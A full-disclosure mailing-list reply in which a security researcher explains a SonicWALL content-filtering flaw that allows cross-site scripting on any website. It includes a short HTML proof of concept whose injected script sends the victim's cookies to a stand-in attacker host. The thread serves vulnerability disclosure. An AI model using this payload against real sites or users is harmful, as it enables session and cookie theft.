Re: Re: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day

[unknown.pentester () gmail com]

It is universal because any domain/website can be hijacked not because all vendors are affected! I never claimed that 
all vendors are affected.

Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance 
which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits. 

Notice that the advisory says:

"the attacker may execute scripts automatically when the logfile is viewed."

The vuln I reported allows you to hijack any site. i.e.: run scripting code within the security context of any website. 
In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal 
information from any sites (i.e.: active webmail session), steal cookies, etc ...

Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need 
to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within 
that site is possible. i.e.:

<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/
'+document.cookie</script>">Click me!</a>
</body></html>

That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the 
inserted script is actually returned by the requested website. You could think of this as a MITM XSS.

Hope it makes sense.